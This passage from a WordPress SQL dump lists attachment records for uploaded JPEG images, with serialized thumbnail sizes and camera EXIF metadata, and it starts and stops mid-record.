D5000\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1472288957\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"300\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:6:\"0.0005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(662,338,'_wp_attached_file','2017/01/DSC0971.jpg'),(663,338,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1260;s:6:\"height\";i:862;s:4:\"file\";s:19:\"2017/01/DSC0971.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"DSC0971-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"DSC0971-300x205.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"DSC0971-768x525.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"DSC0971-1024x701.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:701;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:19:\"DSC0971-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:19:\"DSC0971-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"DSC0971-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:20:\"DSC0971-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:19:\"DSC0971-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:19:\"DSC0971-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:19:\"DSC0971-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:19:\"DSC0971-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D5000\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1472364717\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"300\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(664,339,'_wp_attached_file','2017/01/2008-016.jpg'),(665,339,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2560;s:6:\"height\";i:1920;s:4:\"file\";s:20:\"2017/01/2008-016.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"2008-016-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"2008-016-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"2008-016-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"2008-016-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"2008-016-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"2008-016-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"2008-016-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"2008-016-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"2008-016-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"2008-016-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"2008-016-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"2008-016-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"DiMAGE E500\";s:7:\"caption\";s:29:\"KONICA MINOLTA DIGITAL CAMERA\";s:17:\"created_timestamp\";s:10:\"1216927854\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"5.4\";s:3:\"iso\";s:2:\"75\";s:13:\"shutter_speed\";s:8:\"0.033333\";s:5:\"title\";s:29:\"KONICA MINOLTA DIGITAL CAMERA\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(666,340,'_wp_attached_file','2017/01/all-kins-of-pics-009.jpg'),(667,340,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"file\";s:32:\"2017/01/all-kins-of-pics-009.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"all-kins-of-pics-009-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"all-kins-of-pics-009-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"all-kins-of-pics-009-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"all-kins-of-pics-009-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:32:\"all-kins-of-pics-009-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:32:\"all-kins-of-pics-009-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:32:\"all-kins-of-pics-009-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:33:\"all-kins-of-pics-009-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:32:\"all-kins-of-pics-009-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:32:\"all-kins-of-pics-009-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:32:\"all-kins-of-pics-009-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:32:\"all-kins-of-pics-009-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1211202020\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"7.3\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(668,341,'_wp_attached_file','2017/01/all-kins-of-pics-012.jpg'),(669,341,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"file\";s:32:\"2017/01/all-kins-of-pics-012.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"all-kins-of-pics-012-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"all-kins-of-pics-012-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"all-kins-of-pics-012-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"all-kins-of-pics-012-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:32:\"all-kins-of-pics-012-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:32:\"all-kins-of-pics-012-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:32:\"all-kins-of-pics-012-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:33:\"all-kins-of-pics-012-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:32:\"all-kins-of-pics-012-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:32:\"all-kins-of-pics-012-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:32:\"all-kins-of-pics-012-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:32:\"all-kins-of-pics-012-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1211386308\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"6\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(670,342,'_wp_attached_file','2017/01/boxmeyer02.jpg'),(671,342,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:124;s:6:\"height\";i:93;s:4:\"file\";s:22:\"2017/01/boxmeyer02.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(672,343,'_wp_attached_file','2017/01/Deerhunter-065.jpg'),(673,343,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"file\";s:26:\"2017/01/Deerhunter-065.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Deerhunter-065-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Deerhunter-065-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Deerhunter-065-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"Deerhunter-065-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:26:\"Deerhunter-065-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:26:\"Deerhunter-065-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"Deerhunter-065-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:27:\"Deerhunter-065-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:26:\"Deerhunter-065-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:26:\"Deerhunter-065-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:26:\"Deerhunter-065-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:26:\"Deerhunter-065-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1195824363\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"6\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(674,344,'_wp_attached_file','2017/01/dockset.jpg'),(675,344,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:19:\"2017/01/dockset.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"dockset-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"dockset-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"dockset-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"dockset-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:19:\"dockset-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:19:\"dockset-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"dockset-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:20:\"dockset-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:19:\"dockset-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:19:\"dockset-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:19:\"dockset-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:19:\"dockset-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:14:\"Digital Camera\";s:17:\"created_timestamp\";s:10:\"1042848000\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"9.91\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:15:\"0.0208333333333\";s:5:\"title\";s:14:\"Digital Camera\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(676,345,'_wp_attached_file','2017/01/DSC03045.jpg'),(677,345,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"file\";s:20:\"2017/01/DSC03045.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC03045-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSC03045-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSC03045-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSC03045-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSC03045-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSC03045-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC03045-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSC03045-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSC03045-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSC03045-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSC03045-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSC03045-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1248638170\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"33.1\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(678,346,'_wp_attached_file','2017/01/DSC03568.jpg'),(679,346,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"file\";s:20:\"2017/01/DSC03568.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC03568-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSC03568-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSC03568-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSC03568-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSC03568-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSC03568-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC03568-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSC03568-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSC03568-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSC03568-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSC03568-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSC03568-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1275310293\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"15.5\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:9:\"0.0015625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(680,347,'_wp_attached_file','2017/01/DSC04841.jpg'),(681,347,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:20:\"2017/01/DSC04841.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC04841-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSC04841-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSC04841-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSC04841-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSC04841-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSC04841-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC04841-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSC04841-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4